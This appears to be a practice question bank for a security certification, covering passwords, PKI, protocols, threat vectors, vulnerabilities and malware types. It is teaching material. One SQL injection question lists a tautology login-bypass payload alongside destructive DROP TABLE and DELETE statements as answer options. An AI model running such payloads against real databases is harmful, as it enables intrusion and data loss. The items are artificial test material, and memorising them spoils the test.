
The two factors that are considered important for creating strong passwords are: (Select 2
answers)
 • Password length

• Minimum password age

• Password history

• Password complexity

• Maximum password age

A strong password that meets the password complexity requirement should contain: (Select the best
answer)

• Uppercase letters (A-Z)

• Digits (0-9)

• Non-alphanumeric characters if permitted (e.g., !, @, #, $)

• Lowercase letters (a-z)

• A combination of characters from at least 3 character groups

Which of the following passwords is the most complex?

• T$7C52WL4SU

• GdL3tU8wxYz

• @TxBL$nW@Xt

• G$L3tU8wY@z

Which password policy would be the most effective in decreasing the risk of a security breach across
multiple accounts?

• Password expiration policy

• Minimum password age policy

• Password reuse policy

• Maximum password age policy

Which password policy enforces a mandatory password change after a specific time?

• Password expiration policy

• Password history policy

• Minimum password age policy

• Password reuse policy

The minimum password age policy setting determines the period of time that a password can be used
before the system requires the user to change it.

• True

• False
The maximum password age policy setting determines the period of time that a password must be used
before the user can change it.

• True

• False

Which of the answers listed below refers to a software tool specifically designed to store and manage
login credentials?

• BitLocker

• Password manager

• Key escrow

• Password vault

Which of the following technologies cannot be used as a passwordless authentication method?

• Biometrics

• Hardware tokens

• QR codes

• OTPs

• Passkeys

• All of the above can be used as a means for passwordless authentication

Replacing password characters in a password field with a series of asterisks is an example of:

• Data masking

• Tokenization

• Anonymization

• Pseudo-anonymization

Which of the answers listed below refers to a type of additional input that increases password
complexity and provides better protection against brute-force, dictionary, and rainbow table attacks?

• Seed

• IV

• Salt

• Shim

A pseudo-random data added to a password before hashing is referred to as:

• Shim

• Salt
 • IV

• Seed

Which cryptographic technique is used to prevent the effectiveness of rainbow tables in cracking
hashed passwords?

• Data masking

• Two-Factor Authentication (2FA)

• Key stretching

• Salting

Key stretching is a cryptographic technique that enhances the security of sensitive data, such as
cryptographic keys and passwords. It works by repeatedly applying a resource-intensive function or
algorithm to the input data, thus increasing the computational effort required to derive the
original key or password, which makes the data more resistant to brute-force, dictionary, or
rainbow table attacks.

• True

• False

The importance of changing default usernames and passwords can be illustrated by the example of
certain network devices (such as routers), which are often shipped with default and well-known admin
credentials that can be looked up on the web.

• True

• False

A technique that allows an attacker to authenticate to a remote server without extracting cleartext
password from a digest is known as:

• Pass the hash

• Replay attack

• Brute-force attack

• Spraying attack

A short list of commonly used passwords tried against large number of user accounts is a characteristic
feature of:

• Replay attack

• Dictionary attack

• Spraying attack

• Birthday attack

Which password attack bypasses account-lockout policies?

• Birthday attack
 • Replay attack

• Spraying attack

• Dictionary attack

An attack against encrypted data that relies heavily on computing power to check all possible keys
and passwords until the correct one is found is called:

• Replay attack

• Brute-force attack

• Dictionary attack

• Birthday attack

One of the measures for bypassing the failed logon attempt account lockout policy is to capture any
relevant data that might contain the password and brute force it offline.

• True

• False

Which part of the incident response process involves establishing and maintaining the incident response
capability as well as setting up an incident response team?

• Preparation

• Detection and analysis

• Containment, eradication, and recovery

• Post-incident activity

In the incident response process, the step that involves identifying and understanding potential incidents to
determine their scope, impact, and root cause is a part of the:

• Preparation stage

• Detection and analysis stage

• Containment, eradication, and recovery stage

• Post-incident activity stage

Which of the following answers refer(s) to the containment, eradication, and recovery stage of the incident
response process? (Select all that apply)

• Restoring normal operations

• Eliminating the threat

• Monitoring and detecting potential incidents

• Establishing and maintaining an incident response policy

• Mitigating the impact of the incident

Which stage of the incident response process involves updating incident response plans, policies,
and procedures?

• Preparation

• Detection and analysis

• Containment, eradication, and recovery

• Post-incident activity

Which of the answers listed below refers to a discussion-based activity where team members walk
through different scenarios to evaluate the incident response plan without activating any systems?

• Tabletop exercise

• Simulation

• Threat hunting

• Root cause analysis

Which of the following answers refers to a more in-depth exercise, which can include activating
systems and performing real actions to respond to the incident?

• Penetration testing

• Threat hunting

• Simulation

• Vulnerability scanning

During the post-incident activity stage, this step involves analyzing logs, forensics data, and other evidence
to prevent incident reoccurrence.

• Reporting

• E-discovery

• Root cause analysis

• Threat hunting

The term "Threat hunting" refers to a proactive search for IoC to identify and address potential threats
and vulnerabilities before they can escalate into full-blown incidents.

• True

• False

The process of maintaining a documented record of the handling and movement of evidence to
ensure its integrity and admissibility in court is called:

• Chain of custody

• Chain of evidence
 • Chain of accountability

• Chain of responsibility

The process of identifying, collecting, and producing electronically stored information with the intent of
using it in a legal proceeding or investigation is referred to as:

• Litigation hold

• Evidence management

• Digital forensics

• E-discovery

Which of the protocols listed below is used to enable secure web browsing?

• L2TP

• HTTPS

• SSH

• IPsec

Which of the following protocols allow(s) for secure file transfer? (Select all that apply)

• FTPS

• TFTP

• FTP

• SFTP

FTPS is an extension to the SSH protocol and runs by default on TCP port 22.

• True

• False

Which of the answers listed below refers to a secure replacement for Telnet?

• RSH

• IPsec

• SSH

• RTPS

Which of the following answers refers to a deprecated protocol designed as a secure way to send emails
from a client to a mail server and between mail servers?

• IMAPS

• SFTP

• POP3S
 • SMTPS

Which of the protocols listed below enable secure retrieval of emails from a mail server to an email
client? (Select 2 answers)

• FTPS

• IMAPS

• POP3S

• STARTTLS

• SMTPS

Which of the following protocols enables secure access and management of emails on a mail server
from an email client?

• POP3S

• SMTPS

• IMAPS

• S/MIME

Which of the answers listed below refers to a secure network protocol used to provide encryption,
authentication, and integrity for real-time multimedia communication?

• IPsec

• SIP

• VoIP

• SRTP

Which of the answers listed below refers to a cryptographic technique that verifies the
authenticity and integrity of digital documents or messages by using a unique encrypted identifier from
the sender?

• Digital signature

• Cryptographic hash function

• Digital certificate

• Asymmetric encryption

Which of the following answers refer to algorithms used for generating and verifying digital signatures?
(Select 3 answers)

• ECDSA

• RSA

• ECDHE

• DSA
 • GPG/PGP

Which of the answers listed below refer to DSA? (Select 2 answers)

• Specifically designed for creating and verifying digital signatures

• Primarily used for secure communication and digital signatures

• Not well suited for data encryption (DSA is not an encryption algorithm)

• Used for both encryption and digital signatures in various applications

• Based on the mathematical properties of large prime numbers

Which of the following answers refer to the characteristic features of RSA? (Select 2 answers)

• Based on the discrete logarithm problem

• Primarily used for secure communication and digital signatures

• Used for data encryption

• Specifically designed for creating and verifying digital signatures

• Not well suited for data encryption

Which of the answers listed below best describe the characteristics of ECDSA? (Select 2 answers)

• Used for digital signatures

• Can be used for both encryption and digital signatures

• Does not include a native encryption function

• Enables the encryption of data

• Based on the mathematical properties of large prime numbers

Given the computational limitations of IoT devices, smartcards, and mobile devices, which of the following
digital signature algorithms would be the most efficient choice due to its smaller key
size and lower processing requirements?

• RSA

• ECDHE

• DSA

• ECDSA

• ECC

A hash function is a mathematical algorithm that maps data of arbitrary size to a fixed-size hash value,
typically represented as a short string of characters. The hash function result, also known as a digest or
checksum, provides a unique representation of the original data input. The
functionality of hash functions relies on the fact that if there is any change to the data after the original
hash was generated, the new hash value calculated after content modification will be
different from the original result because hash functions are designed to be sensitive to changes in
the input data.

• True

• False

Hash functions find use in a variety of applications, including:

• Cryptography

• Data integrity verification

• Password verification and storage

• Digital signatures

• Blockchain technology

• All of the above

Which of the answers listed below refers to a cryptographic hash function that has been widely used in
the past but is now considered deprecated for security-sensitive applications due to known
vulnerabilities?

• MD5

• SHA

• CRC

• HMAC

Which of the following answers refers to a family of cryptographic hash functions designed for various
security-related applications, including digital signatures, password storage, secure
communications, and data integrity verification?

• RSA

• AES

• PKCS

• SHA

Which of the hash functions listed below offers the highest level of security?

• MD5

• SHA-3

• RIPEMD-160

• HMAC

Which of the following combines a cryptographic hash function with a secret key to provide a means of
verifying both the authenticity and integrity of a message or data?

• MD5
 • DSA

• HMAC

• DES

Which of the answers listed below refers to a non-cryptographic hash function often used for
error-checking purposes?

• MD5

• CRC

• SHA

• RIPEMD

Which of the following answers can be used to describe self-signed digital certificates? (Select 3 answers)

• Backed by a well-known and trusted third party

• Not trusted by default by web browsers and other applications

• Used in trusted environments, such as internal networks and development environments

• Suitable for websites and other applications that are accessible to the public

• Trusted by default by web browsers and other applications

• Not backed by a well-known and trusted third party A

self-signed digital certificate is also referred to as:

• Client certificate

• EV certificate

• Server certificate

• Wildcard certificate

• None of the above

Third-party digital certificates, issued by trusted CAs, are automatically trusted by most browsers and
operating systems, involve a cost, and require validation of the applicant's identity. In contrast, self-
signed certificates, issued by the entity to itself, are not automatically trusted, are free to create and
use, and do not require validation by a CA.

• True

• False

In the context of digital certificates, the term "Root of trust" refers to the highest level of trust within a
PKI system. It is typically represented by a root CA, which is a trusted third party that serves as the
foundation for the entire PKI. All other entities in the PKI hierarchy, including
intermediate CAs and end-entities (such as web servers, email servers, user devices, IoT devices, and
individual users), derive their trust from this root. When a certificate is issued and signed by
an intermediate CA, it gains trust through a chain of trust back to the root CA. This hierarchical trust
model allows users and systems to trust certificates presented by websites, services, or individuals
because they can trace the trust back to the well-established root of trust.

• True

• False

Which of the answers listed below refers to a PKI trust model?

• Single CA model

• Hierarchical model (root CA + intermediate CAs)

• Mesh model (cross-certifying CAs)

• Web of trust model (all CAs function as root CAs)

• Chain of trust model (multiple CAs in a sequential chain)

• Bridge model (cross-certifying between separate PKIs)

• Hybrid model (combining aspects of different models)

• All of the above

Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

A type of digital certificate that can be used to secure multiple subdomains within a primary domain is
known as:

• Root signing certificate

• Subject Alternative Name (SAN) certificate

• Extended Validation (EV) certificate

• Wildcard certificate

Which digital certificate type allows to secure multiple domain names or subdomains with a single
certificate?

• Extended Validation (EV) certificate

• Wildcard certificate

• Subject Alternative Name (SAN) certificate

• Root signing certificate

Which of the answers listed below refers to an identifier used for PKI objects?

• OID

• DN

• SAN

• GUID

In IT security, the term "Shadow IT" is used to describe the practice of using IT systems, software, or
services within an organization without the explicit approval or oversight of the organization's IT
department.

• True

• False

Which of the following terms is used to describe sophisticated and prolonged cyberattacks often
carried out by well-funded and organized groups, such as nation-states?

• MitM

• APT

• XSRF

• DDoS

An attack surface is the sum of all the potential points (vulnerabilities) through which an attacker can
interact with or compromise a system or network, indicating the overall exposure to potential threats.
Examples of attack surfaces can be all software, hardware, and network interfaces with known
security flaws. A threat vector represents the method or means through which a cyber threat is
introduced or delivered to a target system. It outlines the pathway or avenue used by attackers to
exploit vulnerabilities. Common threat vector types include phishing emails, malware, drive-by
downloads, and social engineering techniques.

• True

• False

Which of the answers listed below refers to an email-based threat vector?

• Spoofing

• Phishing

• BEC attacks

• Malicious links

• Malware attachments

• All of the above

Which of the following terms refers to a threat vector commonly associated with SMS-based
communication?
 • Phishing

• Vishing

• Smishing

• Pharming

Which of the answers listed below refers to an example of a potential threat vector in IM-based
communication?

• Phishing attack

• Malware distribution

• Spoofing attack

• Eavesdropping

• Account hijacking

• Malicious link/attachment

• All of the above

Which of the following answers refer to examples of image-based threat vectors? (Select 3 answers)

• Steganography

• BEC attacks

• Image spoofing (deepfakes)

• Brand impersonation

• Malware-embedded images

Which of the answers listed below refers to a file-based threat vector?

• PDF exploits

• Malicious macros in documents

• Compressed files (ZIP, RAR)

• Malicious scripts in web pages

• Infected images

• Malicious executables

• All of the above

Which of the following answer choices is an example of a threat vector type that is typical for voice
communication?

• Smishing

• Pharming
 • Vishing

• Phishing

Examples of threat vectors directly related to the use of removable devices include: (Select 2
answers)

• Pretexting

• Malware delivery

• Watering hole attacks

• Data exfiltration

• Social engineering attacks

Which of the answers listed below refers to a mobile device's built-in functionality enabling the usage
of locator applications?

• WPS

• GSM

• SIM

• GPS

Which of the following answers refers to a unique 48-bit address assigned to every network adapter?

• PIN

• SSID

• IP

• MAC

In older, non-UEFI based PCs, the first sector of a storage drive containing information about partitions
and a piece of executable code used to load the installed OS is called:

• MBR

• GPT

• PXE

• GUID

In cloud computing, users on an on-premises network take advantage of a transit gateway to connect
to:

• WAN

• VPC

• SAN

• VLAN
Which of the answers listed below refer to DSA? (Select 3 answers)

• Asymmetric algorithm

• Used for the key exchange process

• Symmetric algorithm

• Provides authentication, integrity, and non-repudiation

• Specifically designed for creating and verifying digital signatures

• Used for encryption

Which of the following acronyms refer to office equipment that combines the functionality of multiple
devices? (Select 2 answers)

• MFD

• IoT

• MFP

• PED

• MFA

Which of the answers listed below describe(s) the characteristics of ECDSA? (Select all that apply)

• Provides authentication, integrity, and non-repudiation

• Based on elliptic curve cryptography

• Designed for data encryption

• Specifically designed for creating and verifying digital signatures

• More computationally efficient than other signature algorithms

• Enables the key exchange process

Which of the following answers refers to a deprecated stream cipher used in some legacy applications,
such as WEP?

• RSA

• DES

• SSL

• RC4

Which of the answers listed below refers to a wireless network authentication protocol that enhances
security by encapsulating the authentication process within an encrypted TLS tunnel?

• PEAP

• EAP

• LEAP
 • RADIUS

A type of metric used to evaluate the profitability of an investment by comparing the return generated
from the investment relative to its cost is referred to as:

• ROA

• ROI

• ROS

• ROC

Which of the following facilitates the enforcement of mobile device policies and procedures?

• MFA

• MMC

• MDM

• MFD

Which of the answers listed below refers to an identifier used for objects in a PKI, such as CAs, digital
certificates, and public key algorithms?

• OID

• DN

• SAN

• GUID

Which of the following answers refers to a solution designed to strengthen the security of session
keys?

• ECB

• PFS

• EFS

• PFX

Which of the answers listed below refers to a twisted-pair copper cabling type not surrounded by any
shielding that would provide protection against interference from outside sources?

• STP

• Coax

• UTP

• Twinax

Which of the following terms refers to a technology that enables real-time audio and video
communication between individuals or groups?

• VPC
 • VTC

• VoIP

• VDI

A dedicated data storage solution that combines multiple disk drive components into a single logical
unit to increase volume size, performance, or reliability is known as:

• SAN

• RAID

• NAS

• JBOD

Which of the answers listed below can be used to describe XSRF? (Select 3 answers)

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

Which of the following answers can be used to describe the characteristics of an XSS attack? (Select 3
answers)

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

Which of the answers listed below refers to an encoding method (and a file format) for storing
cryptographic objects such as X.509 certificates, CRLs, and private keys?

• ECB

• PEM

• FIM

• PFS

Which of the following answers refers to a centralized server that is used to distribute cryptographic
keys and authenticate users and services within a computer network?

• PKI
 • RAS

• KDC

• NAS

An AI feature that enables it to accomplish tasks based on training data without explicit human
instructions is called:

• AGI

• ML

• NN

• LLM

Which data packet type is specifically used to detect and prevent network loops in Ethernet networks?

• MTU

• Jumbo frame

• BPDU

• Magic packet

Which of the answers listed below refers to a key exchange protocol that generates temporary keys for
each session, providing forward secrecy to protect past and future communications?

• PFS

• SHA

• PGP

• DHE

Which of the following terms refers to a method for managing infrastructure resources through scripts
and templates?

• IaaS

• ML

• IaC

• SDN

Which of the answers listed below refer to the characteristic features of NIDS? (Select 3 answers)

• Takes proactive measures to block or mitigate intrusion attempts

• Does not take direct action to block or prevent attacks

• Generates alerts and notifies security personnel or administrators when suspicious activity is
detected

• Monitors network traffic without direct involvement in traffic routing or packet modification

• Can drop or reject network packets, terminate connections, or take other actions to stop the
 attack

• Operates in an inline mode, actively intercepting and inspecting network traffic

Which of the following answers refers to a cybersecurity framework that combines network and
security functions into a single cloud-based service?

• SASE

• SIEM

• SWG

• SOAR

A process used by organizations to assess and evaluate the potential impact of disruptive incidents or
disasters on their critical business functions and operations is referred to as:

• BPA

• BIA

• SLE

• BCP

Which of the answers listed below refers to one of the last stages in SDLC?

• UCD

• QA

• UAT

• AUT

Which cipher mode transforms a block cipher into a stream cipher enabling the encryption of individual
bits or bytes of data?

• CFB

• CBC

• GCM

• ECB

Rewriting the destination IP address of incoming data packets, commonly utilized to reroute traffic to
alternative locations or ports is a characteristic feature of:

• IDS

• DNAT

• QoS

• VPN

Which of the following answers refers to a deprecated encryption protocol?

• SSH
 • SHA-256

• S/MIME

• SSL

A collection of precompiled functions designed to be used by more than one Microsoft Windows
application simultaneously to save system resources is known as:

• DLL

• API

• INI

• EXE

Which of the terms listed below refers to a documented plan outlining the steps that should be taken in
each phase of a cybersecurity incident?

• DRP

• IRP

• BCP

• ERP

A block cipher mode that combines a unique counter with encryption key to generate a stream of
pseudorandom data blocks which are then used for encrypting data is called:

• CBC

• GCM

• CFB

• CTM

Which of the following combines a cryptographic hash function with a secret key to provide a means of
verifying both the authenticity and integrity of a message or data?

• MD5

• DSA

• HMAC

• DES

A type of digital document that verifies the identity of an individual, device, service, or organization in
online communications is known as:

• Encryption key

• Digital certificate

• Identity token

• Digital signature
What is the role of RA in PKI? (Select 2 answers)

• Accepting requests for digital certificates

• Validating digital certificates

• Authenticating the entity making the request

• Providing backup source for cryptographic keys

• Issuing digital certificates

Which of the answers listed below refers to a trusted third party responsible for issuing, revoking, and
managing digital certificates?

• RA

• DN

• CA

• CSP

Which of the following answers refers to a means for periodic publication of all digital certificates that
have been revoked?

• CRL

• OSPF

• RA

• CSR

Which of the answers listed below refers to a protocol that enables on-demand querying of the
revocation status of a digital certificate?

• CSP

• OCSP

• DN

• CRL

What is the fastest way to check the validity of a single digital certificate?

• CSR

• DN

• CRL

• OCSP

Which of the following answers can be used to describe self-signed digital certificates? (Select 3
answers)

• Backed by a well-known and trusted third party

• Not trusted by default by web browsers and other applications

 • Used in trusted environments, such as internal networks and development environments

• Suitable for websites and other applications that are accessible to the public

• Trusted by default by web browsers and other applications

• Not backed by a well-known and trusted third party

A self-signed digital certificate is also referred to as:

• Client certificate

• EV certificate

• Server certificate

• Wildcard certificate

• None of the above

Third-party digital certificates, issued by trusted CAs, are automatically trusted by most browsers and
operating systems, involve a cost, and require validation of the applicant's identity. In contrast, self-
signed certificates, issued by the entity to itself, are not automatically trusted, are free to create and
use, and do not require validation by a CA.

• True

• False

In the context of digital certificates, the term "Root of trust" refers to the highest level of trust within a
PKI system. It is typically represented by a root CA, which is a trusted third party that serves as the
foundation for the entire PKI. All other entities in the PKI hierarchy, including intermediate CAs and end-
entities (such as web servers, email servers, user devices, IoT devices, and individual users), derive
their trust from this root. When a certificate is issued and signed by an intermediate CA, it gains trust
through a chain of trust back to the root CA. This hierarchical trust model allows users and systems to
trust certificates presented by websites, services, or individuals because they can trace the trust back
to the well-established root of trust.

• True

• False

Which of the answers listed below refers to a PKI trust model?

• Single CA model

• Hierarchical model (root CA + intermediate CAs)

• Mesh model (cross-certifying CAs)

• Web of trust model (all CAs function as root CAs)

• Chain of trust model (multiple CAs in a sequential chain)

• Bridge model (cross-certifying between separate PKIs)

• Hybrid model (combining aspects of different models)

• All of the above

Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

A type of digital certificate that can be used to secure multiple subdomains within a primary domain is
called:

• Root signing certificate

• Subject Alternative Name (SAN) certificate

• Extended Validation (EV) certificate

• Wildcard certificate

Which digital certificate type allows to secure multiple domain names or subdomains with a single
certificate?

• Extended Validation (EV) certificate

• Wildcard certificate

• Subject Alternative Name (SAN) certificate

• Root signing certificate

Which of the answers listed below refers to an identifier used for PKI objects?

• OID

• DN

• SAN

• GUID

Exploiting known vulnerability is a common threat vector for:

• Legacy systems/apps

• Unsupported systems/apps

• Newly released systems/apps

• Systems/apps with zero-day vulnerability

A solution that simplifies configuration of new wireless networks by allowing non-technical users to
easily configure network security settings and add new devices to an existing network is called:

• WPA

• WPS

• WEP
 • WAP

Which of the wireless technologies listed below are considered potential threat vectors and should be
avoided due to their known vulnerabilities? (Select all that apply)

• WPS

• WAP

• WPA

• WAF

• WPA2

• WEP

The term "Evil twin" refers to a rogue WAP set up for eavesdropping or stealing sensitive user data. Evil
twin replaces the legitimate AP and by advertising its own presence with the same Service Set Identifier
(SSID, a.k.a. network name) appears as a legitimate AP to connecting hosts.

• True

• False

Which of the following answers refers to a threat vector characteristic only to wired networks?

• ARP Spoofing

• VLAN hopping

• Cable tapping

• Port sniffing

• All of the above

Examples of threat vectors related to Bluetooth communication include: bluesmacking (a type of DoS
attack that targets Bluetooth devices by overwhelming them with excessive traffic), bluejacking (the
practice of sending unsolicited messages or data to a Bluetooth-enabled device), bluesnarfing (gaining
unauthorized access to a Bluetooth device and data theft), and bluebugging (gaining remote control
over a Bluetooth device).

• True

• False

Which of the answers listed below refers to the most probable cause of an unauthorized access
caused by the exploitation of a specific network entry point?

• Outdated AV software

• Browser cookies

• Open service ports

• Insufficient logging and monitoring

The importance of changing default usernames and passwords can be illustrated by the example of
certain network devices (such as routers), which are often shipped with default and well-known admin
credentials that can be looked up on the web.

• True

• False

Which of the following would be the best solution for a company that needs IT services but lacks any IT
personnel?

• MSA

• MaaS

• MSP

• MSSP

Which of the terms listed below refers to a third-party vendor offering IT security management
services?

• MSP

• MaaS

• MSA

• MSSP

Which of the following answers refer to common threat vectors that apply to MSPs, vendors, and
suppliers in the supply chain? (Select 2 answers)

• Compliance violations

• Brand reputation damage

• Propagation of malware

• Operational disruptions

• Social engineering techniques

A social engineering technique whereby attackers under disguise of a legitimate request attempt to
gain access to confidential information is commonly referred to as:

• Phishing

• Smishing

• Pharming

• Spoofing

Which social engineering attack relies on identity theft?

• Pretexting

• Spear phishing

• Tailgating

• Impersonation
A BEC attack is an example of:

• Smishing

• Phishing

• Vishing

• Pharming

Which of the answers listed below refers to a social engineering technique where an attacker creates a
false scenario or situation to deceive the victim into revealing sensitive information?

• Impersonation

• Credential harvesting

• Pretexting

• Watering hole attack

Which of the following terms refers to a platform used for watering hole attacks?

• Mail gateways

• Websites

• PBX systems

• Web browsers

The term "URL hijacking" (a.k.a. "Typosquatting") refers to a deceptive practice involving the deliberate
registration of domain names with misspellings or slight variations that closely resemble well-
established and popular domain names. The primary goal of this strategy is to exploit the common
typographical errors made by users while entering URLs into their web browser's address bar. Beyond
capturing inadvertent traffic, typosquatting may also be used for hosting phishing sites to trick users
into divulging sensitive information, distributing malware through deceptive websites, generating ad
revenue by redirecting mistyped traffic, or engaging in brand impersonation to harm the reputation of
authentic brands or deceive users.

• True

• False

Which type of application attack relies on introducing external code into the address space of a running
program?

• Buffer overflow

• Memory injection

• Replay attack

• Pointer dereference

A collection of precompiled functions designed to be used by more than one Microsoft Windows
application simultaneously to save system resources is known as:

• DLL
 • API

• EXE

• INI

Which of the answers listed below refers to an application attack that relies on executing a library of
code?

• Memory leak

• DLL injection

• Pointer dereference

• Buffer overflow

A type of exploit in which an application overwrites the contents of a memory area it should not have
access to is called:

• DLL injection

• Buffer overflow

• Memory leak

• Privilege escalation

A malfunction in a preprogrammed sequential access to a shared resource is described as:

• Race condition

• Concurrency error

• Multithreading

• Synchronization error

A type of vulnerability where the state of a resource is verified at one point in time but may change
before the resource is actually used is referred to as:

• TOC

• TOC/TOU

• TOU

• TSIG

A malicious application update is a type of malware that can be installed through a seemingly
legitimate software update. The introduction of a malicious update into the application code can be
enabled through various means, including:

• Unsigned application code

• Unencrypted update channel (HTTP vs HTTPS)

• Fake update website

• Unauthorized access to update server

 • Compromised software development process

• All of the above

Which of the following answers does not refer to a common type of OS-based vulnerability?

• Access control and permissions vulnerabilities (weak passwords, privilege escalation)

• Vulnerabilities in installed applications, system utilities, and device drivers

• Memory-related vulnerabilities (memory leaks, buffer overflows, race conditions)

• Patch and update management vulnerabilities (security patch and update delays, malicious
updates)

• Vulnerabilities related to system/security misconfigurations

• Network-related vulnerabilities (DoS attacks, remote code execution attacks)

• All of the above answer choices are examples of OS-based vulnerabilities

Which of the programming aspects listed below are critical in the secure application development
process? (Select 2 answers)

• Patch management

• Input validation

• Password protection

• Error and exception handling

• Application whitelisting

A situation in which a web form field accepts data other than expected (e.g., server commands) is an
example of:

• Zero-day vulnerability

• Improper input validation

• Default configuration

• Improper error handling

Which of the following answers refers to a countermeasure against code injection?

• Fuzzing

• Input validation

• Code signing

• Normalization

The term "Secure cookie" refers to a type of HTTP cookie that is transmitted over an encrypted HTTPS
connection, which helps prevent the cookie from being intercepted or tampered with during transit.

• True

• False
Which of the terms listed below refers to an automated or manual code review process aimed at
discovering logic and syntax errors in the application's source code?

• Input validation

• Dynamic code analysis

• Fuzzing

• Static code analysis

A dynamic code analysis allows for detecting application flaws without the need for actual execution
of the application code.

• True

• False

The term "Static code analysis" refers to the process of discovering application runtime errors.

• True

• False

What is the purpose of code signing? (Select 2 answers)

• Disables code reuse

• Confirms the application's source of origin

• Enables application installation

• Validates the application's integrity

• Protects the application against unauthorized use

The practice of finding vulnerabilities in an application by feeding it incorrect input is called:

• Normalization

• Hardening

• Dynamic code analysis

• Fuzzing

In computer security, a mechanism for safe execution of untested code or untrusted applications is
referred to as:

• Sideloading

• Virtualization

• Sandboxing

• Stress testing

Which of the following answers refers to a Windows-specific feature for handling exceptions, errors,
and abnormal conditions in software?

• EPC
 • SEH

• EH

• EXR

Address Space Layout Randomization (ASLR) is an OS security technique that randomizes the location
of key data areas in memory. The purpose of ASLR is to prevent attackers from predicting the location
of specific code or data in memory, which adds a layer of defense against memory-based attacks, such
as buffer overflows.

• True

• False

A type of user identification mechanism used as a countermeasure against automated software (such
as network bots) is known as:

• MFA

• CAPTCHA

• SSO

• NIDS

Which of the answers listed below refers to a security vulnerability that enables inserting malicious
code into input fields, such as search bars or login forms, to execute unauthorized commands on a
database?

• RCE

• SQLi

• XSS

• CSRF

Which of the following indicates an SQL injection attack attempt?

• DELETE FROM itemDB WHERE itemID = '1';

• SELECT * FROM users WHERE userName = 'Alice' AND password = '' OR '1' = '1';

• DROP TABLE itemDB;

• SELECT * FROM users WHERE email = '[email protected]' AND password = '';

Which of the answers listed below describe the characteristics of a cross-site scripting attack? (Select
3 answers)

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

 • Website executes attacker's requests

Which of the following answers refers to a type of software embedded into a hardware chip?

• Firmware

• Middleware

• Device driver

• Machine code

Which of the terms listed below refers to a product's life-cycle management phase in which a product
is no longer being produced or sold?

• EOS

• EOF

• EOL

• EOA

What is the main vulnerability related to legacy hardware?

• Compatibility issues

• Lack of security updates and patches

• Worn-out physical components

• Lack of skilled personnel to run it and maintain it

The term "VM escape" refers to the process of breaking out of the boundaries of a guest operating
system installation to access the primary hypervisor controlling all the virtual machines on the host
machine.

• True

• False

Which of the following answers refers to a virtualization-related vulnerability where virtualized assets
allocated to one VM are improperly isolated and can be accessed or compromised by another VM?

• Resource reuse

• Privilege escalation

• Resource exhaustion

• Concurrent session usage

Which of the answers listed below refers to a cloud-related vulnerability type?

• Insecure APIs

• Poor access controls

• Lack of security updates

• Misconfigured cloud storage

 • Shadow IT / Malicious insiders

• All of the above

The practice of installing mobile apps from websites and app stores other than the official
marketplaces is referred to as:

• Jailbreaking

• Rooting

• Sideloading

• Carrier unlocking

Which of the following terms is used to describe the process of removing software restrictions imposed
by Apple on its iOS operating system?

• Sideloading

• Carrier unlocking

• Rooting

• Jailbreaking

The term "Rooting" refers to the capability of gaining administrative access to the operating system and
system applications on:

• Android devices

• iOS devices

• Microsoft devices

• All types of mobile devices

A type of attack aimed at exploiting vulnerability that is present in already released software but
unknown to the software developer is known as:

• On-path attack

• IV attack

• Zero-day attack

• Replay attack

Malware that restricts access to a computer system by encrypting files or locking the entire system
down until the user performs requested action is called:

• Grayware

• Adware

• Ransomware

• Spyware

A Trojan horse is a type of software that performs harmful actions under the guise of a legitimate and
useful program. The most characteristic feature of Trojan horse is that while it may function as a
legitimate program and possess all the expected functionalities, it also contains a concealed portion of
malicious code that the user is unaware of.

• True

• False

Which type of Trojan enables unauthorized remote access to a compromised system?

• APT

• RAT

• MaaS

• PUP

A standalone malicious computer program that typically propagates itself over a computer network to
adversely affect system resources and network bandwidth is referred to as:

• Worm

• Fileless virus

• Bot

• Logic bomb

Malicious software collecting information about users without their knowledge/consent is known as:

• Cryptomalware

• Adware

• Ransomware

• Spyware

Which of the answers listed below refer to the characteristic features of bloatware? (Select 3 answers)

• Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance

• Installed without user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security

Which of the following answers refer to the characteristics of a PUP? (Select 3 answers)

• Often installed without clear user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security
 • Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance

Which of the statements listed below apply to the definition of a computer virus? (Select 3 answers)

• A self-replicating computer program containing malicious segment

• Malware that typically requires its host application to be run to make the virus active

• A standalone malicious computer program that replicates itself over a computer network

• Malware that can run by itself without any interaction

• Malicious code that typically attaches itself to an application program or other executable
component

• A self-contained malicious program or code that does need a host to propagate itself

Which of the following is an example of spyware?

• Keylogger

• Vulnerability scanner

• Computer worm

• Packet sniffer

Malicious code activated by a specific event is called:

• Cryptomalware

• Backdoor

• Rootkit

• Logic bomb

Which of the following answers refers to a collection of software tools used by a hacker to mask
intrusion and obtain administrator-level access to a computer or computer network?

• Rootkit

• Spyware

• Backdoor

• Trojan

The term "RFID cloning" refers to copying the data stored on any RFID-enabled device (including tags,
cards, key fobs, implants, and other objects embedded with RFID technology) onto another RFID-
enabled device, which then can be read and used in the same way as the original tag. While RFID
cloning can be utilized for legitimate purposes, such as replicating important tags for backup and
testing purposes, it also poses significant security risk, as duplicate tags can potentially be used for
gaining unauthorized access or unauthorized information disclosure.

• True

• False
 As opposed to simple DoS attacks that usually are performed from a single system, a DDoS attack
uses multiple compromised computer systems to perform the attack against its target. The
intermediary systems that are used as a platform for the attack (often referred to as zombies, and
collectively as a botnet) are the secondary victims of the DDoS attack.

• True

• False

A type of DDoS attack where an attacker exploits vulnerabilities in certain services or protocols to
generate responses that are much larger than the original request is referred to as:

• Amplified DDoS attack

• Volumetric DDoS attack

• Reflected DDoS attack

• Application DDoS attack

